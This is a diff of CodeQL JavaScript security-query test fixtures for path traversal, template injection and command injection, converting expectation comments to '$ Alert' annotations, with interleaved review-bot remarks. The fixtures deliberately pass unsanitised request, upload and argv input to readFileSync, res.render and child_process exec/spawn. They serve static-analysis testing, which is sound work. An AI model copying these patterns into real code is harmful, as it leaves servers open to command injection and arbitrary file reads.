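Review bot: The last line of this hunk, `res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/'`, keeps the old free-form wording while every other line moves to `// $ Alert` or `// OK - …`. "kinda OK" is not an expectation a reader or the test harness can act on. If leaving `data/` counts as a finding, write it as `// $ MISSING: Alert - can only escape from 'data/'`; otherwise use `// OK - can only escape from 'data/'`. The handler continues past the end of the hunk.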
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js
+++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js
@@ -4,28 +4,28 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path.substring(i, j)); // OK - fs.readFileSync(path.substring(4)); // NOT OK - fs.readFileSync(path.substring(0, i)); // NOT OK - fs.readFileSync(path.substr(4)); // NOT OK - fs.readFileSync(path.slice(4)); // NOT OK + fs.readFileSync(path.substring(i, j)); + fs.readFileSync(path.substring(4)); // $ Alert + fs.readFileSync(path.substring(0, i)); // $ Alert + fs.readFileSync(path.substr(4)); // $ Alert + fs.readFileSync(path.slice(4)); // $ Alert - fs.readFileSync(path.concat(unknown)); // NOT OK - fs.readFileSync(unknown.concat(path)); // NOT OK - fs.readFileSync(unknown.concat(unknown, path)); // NOT OK + fs.readFileSync(path.concat(unknown)); // $ Alert + fs.readFileSync(unknown.concat(path)); // $ Alert + fs.readFileSync(unknown.concat(unknown, path)); // $ Alert - fs.readFileSync(path.trim()); // NOT OK - fs.readFileSync(path.toLowerCase()); // NOT OK + fs.readFileSync(path.trim()); // $ Alert + fs.readFileSync(path.toLowerCase()); // $ Alert - fs.readFileSync(path.split('/')); // OK (readFile throws an exception when the filename is an array) - fs.readFileSync(path.split('/')[0]); // OK -- for now - fs.readFileSync(path.split('/')[i]); // NOT OK - fs.readFileSync(path.split(/\//)[i]); // NOT OK - fs.readFileSync(path.split("?")[0]); // NOT OK - fs.readFileSync(path.split(unknown)[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown).whatever); // OK -- but still flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown)); // NOT OK - fs.readFileSync(path.split("?")[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] + fs.readFileSync(path.split('/')); // OK - readFile throws an exception when the filename is an array + fs.readFileSync(path.split('/')[0]); // OK - for now + fs.readFileSync(path.split('/')[i]); // $ Alert + fs.readFileSync(path.split(/\//)[i]); 
// $ Alert + fs.readFileSync(path.split("?")[0]); // $ Alert + fs.readFileSync(path.split(unknown)[i]); // $ MISSING: Alert + fs.readFileSync(path.split(unknown).whatever); // $ SPURIOUS: Alert + fs.readFileSync(path.split(unknown)); // $ Alert + fs.readFileSync(path.split("?")[i]); // $ MISSING: Alert }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 1e95cf84ec76..097bcc1fa117 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -4,5 +4,5 @@ const parseTorrent = require('parse-torrent'), function getTorrentData(dir, torrent){ let name = parseTorrent(torrent).name, loc = dir + "/" + name + ".torrent.data"; - return fs.readFileSync(loc); // NOT OK + return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index f5fd62b2ee00..51549ea75658 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts 
@@ -8,27 +8,26 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list let path2 = path; - path2 ||= res.write(fs.readFileSync(path2)); // GOOD: path is falsy + path2 ||= res.write(fs.readFileSync(path2)); // OK - path is falsy let path3 = path; - path3 &&= res.write(fs.readFileSync(path3)); // BAD: path is truthy + path3 &&= res.write(fs.readFileSync(path3)); // $ Alert - path is truthy let path4 = path; - path4 ??= res.write(fs.readFileSync(path4)); // GOOD - path is null or undefined - but we don't capture that. [INCONSISTENCY] + path4 ??= res.write(fs.readFileSync(path4)); // $ SPURIOUS: Alert - path is null or undefined - but we don't capture that. let path5 = path; path5 &&= "clean"; - res.write(fs.readFileSync(path5)); // GOOD: path is either falsy or "clean"; + res.write(fs.readFileSync(path5)); // OK - path is either falsy or "clean"; let path6 = path; path6 ||= "clean"; - res.write(fs.readFileSync(path6)); // BAD: path can still be tainted + res.write(fs.readFileSync(path6)); // $ Alert - path can still be tainted }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index 0146533c6dca..bf14b568196b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js 
@@ -50,6 +50,6 @@ function doZipSlip() { files.push(name); } for (const file of files) { - fs.createWriteStream(path.join(extractTo, file)); // OK + fs.createWriteStream(path.join(extractTo, file)); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js index 07918647e6f0..45e4ced8380b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js @@ -26,7 +26,7 @@ fs.createReadStream('archive.zip') } if (!fileName.startsWith(".")) { - entry.pipe(fs.createWriteStream(fileName)); // OK. + entry.pipe(fs.createWriteStream(fileName)); } }); @@ -35,5 +35,5 @@ fs.createReadStream('archive.zip') .on('entry', entry => { const fileName = path.normalize(entry.path); - entry.pipe(fs.createWriteStream(path.basename(fileName))); // OK. + entry.pipe(fs.createWriteStream(path.basename(fileName))); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/routes.js b/javascript/ql/test/query-tests/Security/CWE-073/routes.js index 2bfbad7cd37b..07e03fc0f404 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/routes.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/routes.js @@ -1,3 +1,3 @@ exports.foo = function(req, res) { - res.render('foo', req.body); // NOT OK + res.render('foo', req.body); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index ee2bff5f0e78..8b6c30c46947 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js 
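Review bot: Removing `// OK` from `fs.createWriteStream(path.join(extractTo, file));` leaves a write sink inside `doZipSlip()`, in a file named ZipSlipBad.js, with no statement of why no alert is expected there. The function starts above the hunk, so the origin of `name` is not visible. If it is an archive entry name, joining it onto `extractTo` with no containment check is the very pattern this directory tests. In that case the line should either be `// $ MISSING: Alert` with a reason or carry a comment such as `// OK - no alert expected on this line; see where the entry name is read`, whichever matches the query's actual reporting location.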
@@ -7,26 +7,26 @@ app.post('/path', function(req, res) { var bodyParameter = req.body.bodyParameter; var queryParameter = req.query.queryParameter; - res.render('template', bodyParameter); // NOT OK - res.render('template', queryParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert + res.render('template', queryParameter); // $ Alert if (typeof bodyParameter === "string") { - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); } - res.render('template', queryParameter + ""); // OK + res.render('template', queryParameter + ""); - res.render('template', {profile: bodyParameter}); // OK + res.render('template', {profile: bodyParameter}); indirect(res, queryParameter); }); function indirect(res, obj) { - res.render("template", obj); // NOT OK + res.render("template", obj); // $ Alert const str = obj + ""; - res.render("template", str); // OK + res.render("template", str); - res.render("template", JSON.parse(str)); // NOT OK + res.render("template", JSON.parse(str)); // $ Alert } let routes = require('./routes'); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 6cb626fd7c1c..8f8b075010bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js 
@@ -4,27 +4,27 @@ app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app2 = require('express')(); app2.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app3 = require('express')(); app3.set('view engine', 'pug'); app3.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app5 = require('express')(); @@ -32,7 +32,7 @@ app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app6 = require('express')(); @@ -40,7 +40,7 @@ app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); const express = require('express'); 
@@ -49,6 +49,6 @@ var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 1cfea0118bc2..3f50d6d5df66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -6,7 +6,7 @@ const { exec } = require('child_process'); function echo_title() { // get the title from the event pull request const title = github.context.payload.pull_request.title; - exec(`echo ${title}`, (err, stdout, stderr) => { // NOT OK + exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; } @@ -16,7 +16,7 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { const head_ref = github.context.payload.pull_request.head.ref; - aexec.exec(`echo ${head_ref}`).then((res) => { // NOT OK + aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index abc9704a48e8..ddfa7b720d02 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js 
@@ -5,61 +5,61 @@ var cp = require("child_process"), var server = http.createServer(function(req, res) { let cmd = url.parse(req.url, true).query.path; - cp.exec("foo"); // OK - cp.execSync("foo"); // OK - cp.execFile("foo"); // OK - cp.execFileSync("foo"); // OK - cp.spawn("foo"); // OK - cp.spawnSync("foo"); // OK - cp.fork("foo"); // OK + cp.exec("foo"); + cp.execSync("foo"); + cp.execFile("foo"); + cp.execFileSync("foo"); + cp.spawn("foo"); + cp.spawnSync("foo"); + cp.fork("foo"); - cp.exec(cmd); // NOT OK - cp.execSync(cmd); // NOT OK - cp.execFile(cmd); // NOT OK - cp.execFileSync(cmd); // NOT OK - cp.spawn(cmd); // NOT OK - cp.spawnSync(cmd); // NOT OK - cp.fork(cmd); // NOT OK + cp.exec(cmd); // $ Alert + cp.execSync(cmd); // $ Alert + cp.execFile(cmd); // $ Alert + cp.execFileSync(cmd); // $ Alert + cp.spawn(cmd); // $ Alert + cp.spawnSync(cmd); // $ Alert + cp.fork(cmd); // $ Alert - cp.exec("foo" + cmd + "bar"); // NOT OK + cp.exec("foo" + cmd + "bar"); // $ Alert // These are technically NOT OK, but they are more likely as false positives - cp.exec("foo", {shell: cmd}); // OK - cp.exec("foo", {env: {PATH: cmd}}); // OK - cp.exec("foo", {cwd: cmd}); // OK - cp.exec("foo", {uid: cmd}); // OK - cp.exec("foo", {gid: cmd}); // OK + cp.exec("foo", {shell: cmd}); + cp.exec("foo", {env: {PATH: cmd}}); + cp.exec("foo", {cwd: cmd}); + cp.exec("foo", {uid: cmd}); + cp.exec("foo", {gid: cmd}); let sh, flag; if (process.platform == 'win32') sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // NOT OK + cp.spawn(sh, [ flag, cmd ]); // $ Alert let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert cp.execFile("/bin/bash", args); let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert run("sh", args); let args = []; args[0] = `-` + "c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert cp.execFile(`/bin` + "/bash", args); - cp.spawn('cmd.exe', ['/C', 
'foo'].concat(["bar", cmd])); // NOT OK - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY] + cp.execFile(`/bin` + "/bash", args); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); @@ -72,7 +72,7 @@ var util = require("util") http.createServer(function(req, res) { let cmd = url.parse(req.url, true).query.path; - util.promisify(cp.exec)(cmd); // NOT OK + util.promisify(cp.exec)(cmd); // $ Alert }); @@ -80,7 +80,7 @@ const webpackDevServer = require('webpack-dev-server'); new webpackDevServer(compiler, { before: function (app) { app.use(function (req, res, next) { - cp.exec(req.query.fileName); // NOT OK + cp.exec(req.query.fileName); // $ Alert require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo }); @@ -91,5 +91,5 @@ import Router from "koa-router"; const router = new Router(); router.get("/ping/:host", async (ctx) => { - cp.exec("ping " + ctx.params.host); // NOT OK + cp.exec("ping " + ctx.params.host); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b5b8fc602bdf..b2cfe4424039 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,7 +12,7 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert } http.createServer(function (req, res) { 
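Review bot: The final `cp.execFile` call in the first handler passes `args`, not the `myArgs` array that the two `myArgs.push(...)` lines just built. The `$ MISSING: Alert - no support for [].push() for indirect arguments` expectation therefore does not exercise the push-based flow its comment describes. `args` at that point is the earlier index-assigned array, so a missing result here says nothing about `push()` modelling. Changing the last argument of that call from `args` to `myArgs` would make the fixture test what the annotation claims; the expectation may then need re-checking against the query output.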
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index ad91b66f5344..9d12f22bb249 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,7 +7,7 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // BAD + return cp.spawn(getShell(), ["-c", command], options) // $ Alert }; http.createServer(function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 25e45d675d9f..1cfc40856113 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -11,7 +11,7 @@ function asyncEach(arr, iterator) { } function execEach(commands) { - asyncEach(commands, (command) => exec(command)); // NOT OK + asyncEach(commands, (command) => exec(command)); // $ Alert }; require('http').createServer(function(req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 4b1dabde4412..0efc3279cf50 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js 
@@ -6,12 +6,12 @@ var app = express(); var exec = require("child_process").exec; app.post('/profile', upload.single('avatar'), function (req, res, next) { - exec("touch " + req.file.originalname); // NOT OK + exec("touch " + req.file.originalname); // $ Alert }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { req.files.forEach(file => { - exec("touch " + file.originalname); // NOT OK + exec("touch " + file.originalname); // $ Alert }) }); @@ -22,7 +22,7 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { - exec("touch " + filename); // NOT OK + exec("touch " + filename); // $ Alert }); req.pipe(busboy); }).listen(8000); @@ -33,12 +33,12 @@ app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); form.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); form2.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); }); @@ -50,13 +50,13 @@ http.createServer(function (req, res) { var form = new multiparty.Form(); form.parse(req, function (err, fields, files) { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); form2.on('part', function (part) { // / file / field - exec("touch " + part.filename); // NOT OK + exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index 2e86ace433ce..a606c9166175 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js 
@@ -4,32 +4,32 @@ var http = require("http"), var server = http.createServer(function (req, res) { let cmd = url.parse(req.url, true).query.path; - require("cross-spawn").sync(cmd); // NOT OK - require("execa").shell(cmd); // NOT OK - require("execa").shellSync(cmd); // NOT OK - require("execa").stdout(cmd); // NOT OK - require("execa").stderr(cmd); // NOT OK - require("execa").sync(cmd); // NOT OK - - require("cross-spawn")(cmd); // NOT OK - require("cross-spawn-async")(cmd); // NOT OK - require("exec")(cmd); // NOT OK - require("exec-async")(cmd); // NOT OK - require("execa")(cmd); // NOT OK - require("remote-exec")(target, cmd); // NOT OK + require("cross-spawn").sync(cmd); // $ Alert + require("execa").shell(cmd); // $ Alert + require("execa").shellSync(cmd); // $ Alert + require("execa").stdout(cmd); // $ Alert + require("execa").stderr(cmd); // $ Alert + require("execa").sync(cmd); // $ Alert + + require("cross-spawn")(cmd); // $ Alert + require("cross-spawn-async")(cmd); // $ Alert + require("exec")(cmd); // $ Alert + require("exec-async")(cmd); // $ Alert + require("execa")(cmd); // $ Alert + require("remote-exec")(target, cmd); // $ Alert const ssh2 = require("ssh2"); - new ssh2().exec(cmd); // NOT OK - new ssh2.Client().exec(cmd); // NOT OK + new ssh2().exec(cmd); // $ Alert + new ssh2.Client().exec(cmd); // $ Alert const SSH2Stream = require("ssh2-streams").SSH2Stream; - new SSH2Stream().exec(false, cmd); // NOT OK + new SSH2Stream().exec(false, cmd); // $ Alert - require("execa").node(cmd); // NOT OK + require("execa").node(cmd); // $ Alert - require("foreground-child")(cmd); // NOT OK + require("foreground-child")(cmd); // $ Alert const opener = require("opener"); - opener("http://github.com/" + url.parse(req.url, true).query.user); // OK - opener("http://github.com", { command: cmd }); // NOT OK + opener("http://github.com/" + url.parse(req.url, true).query.user); + opener("http://github.com", { command: cmd }); // $ Alert }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 7a8f6982f178..74301997e38c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -1,14 +1,14 @@ import { exec } from "@actions/exec"; import { getInput } from "@actions/core"; -exec(process.env['TEST_DATA']); // NOT OK -exec(process.env['GITHUB_ACTION']); // OK +exec(process.env['TEST_DATA']); // $ Alert +exec(process.env['GITHUB_ACTION']); function test(e) { - exec(e['TEST_DATA']); // NOT OK - exec(e['GITHUB_ACTION']); // OK + exec(e['TEST_DATA']); // $ Alert + exec(e['GITHUB_ACTION']); } test(process.env); -exec(getInput('data')); // NOT OK +exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index 17b8b6c9c25e..fd1e9cdd9f97 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js 
@@ -1,36 +1,36 @@ var cp = require("child_process"); (function() { - cp.exec(process.argv); // NOT OK (just weird) - cp.exec(process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[1]); // OK - cp.exec("cmd.sh " + process.argv[2]); // NOT OK + cp.exec(process.argv); // $ Alert - just weird + cp.exec(process.argv[0]); + cp.exec("cmd.sh " + process.argv[0]); + cp.exec("cmd.sh " + process.argv[1]); + cp.exec("cmd.sh " + process.argv[2]); // $ Alert var args = process.argv.slice(2); - cp.execSync(args[0]); // NOT OK - cp.execSync("cmd.sh " + args[0]); // NOT OK + cp.execSync(args[0]); // $ Alert + cp.execSync("cmd.sh " + args[0]); // $ Alert var fewerArgs = args.slice(1); - cp.execSync(fewerArgs[0]); // NOT OK - cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK + cp.execSync(fewerArgs[0]); // $ Alert + cp.execSync("cmd.sh " + fewerArgs[0]); // $ Alert var arg0 = fewerArgs[0]; - cp.execSync(arg0); // NOT OK - cp.execSync("cmd.sh " + arg0); // NOT OK + cp.execSync(arg0); // $ Alert + cp.execSync("cmd.sh " + arg0); // $ Alert }); (function() { const args = process.argv.slice(2); const script = path.join(packageDir, 'app', 'index.js'); - cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK - cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK + cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert + cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert }); -cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK +cp.exec("cmd.sh " + require("get-them-args")().foo); // $ Alert cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided. -cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK -cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK +cp.exec("cmd.sh " + require("yargs").argv.foo); // $ Alert +cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var args = require('yargs') // eslint-disable-line 
@@ -38,9 +38,9 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK .option('verbose', { foo: "bar" }) .argv - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK + cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // $ Alert }); (function () { @@ -52,7 +52,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK .usage('Usage: foo bar') .command(); - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert var tainted1 = require('yargs').argv; var tainted2 = require('yargs').parse() 
@@ -62,34 +62,34 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK taint2: tainted2 } - cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1 - cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2 + cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 + cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 var {...taint3} = require('yargs').argv; - cp.exec("cmd.sh " + taint3); // NOT OK + cp.exec("cmd.sh " + taint3); // $ Alert var [...taint4] = require('yargs').argv; - cp.exec("cmd.sh " + taint4); // NOT OK + cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { const argv = process.argv.slice(2); var minimist = require("minimist"); - cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK + cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert var subarg = require('subarg'); - cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // $ Alert var yargsParser = require('yargs-parser'); - cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' var flags = args.parse(process.argv); - cp.exec("cmd.sh " + flags.foo); // NOT OK + cp.exec("cmd.sh " + flags.foo); // $ Alert var flags = require('arg')({...spec}); - cp.exec("cmd.sh " + flags.foo); // NOT OK + cp.exec("cmd.sh " + flags.foo); // $ Alert }) (function () { @@ -99,13 +99,13 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK parser.add_argument('-f', '--foo', { help: 'foo bar' }); - cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK + cp.exec("cmd.sh " + parser.parse_args().foo); // $ Alert }); (function () { const commandLineArgs = require('command-line-args'); const options = commandLineArgs(optionDefinitions); - cp.exec("cmd.sh " + options.foo); // NOT OK + cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { 
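Review bot: The rewritten comment on the `taint2rest` line keeps the misspelling `tianted2`, although the line above reads `tainted1` and the variable declared earlier in the function is `tainted2`. Since the line is being rewritten anyway, I would change it to `// $ Alert - has flow from tainted2`. The text after the `-` looks like free-form commentary, so this should not affect the expectation itself. The enclosing function starts before this hunk.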
@@ -113,7 +113,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const cli = meow(`helpstring`, {flags: {...flags}}); - cp.exec("cmd.sh " + cli.input[0]); // NOT OK + cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); (function () { @@ -121,20 +121,20 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK var opts = dashdash.parse({options: options}); - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); var opts = parser.parse(); - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { const { program } = require('commander'); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert }); (function () { @@ -142,8 +142,8 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const program = new Command(); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert - cp.execFile(program.opts().pizzaType, ["foo", "bar"]); // OK + cp.execFile(program.opts().pizzaType, ["foo", "bar"]); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index f68093d24053..16ace6a020f6 100644 --- 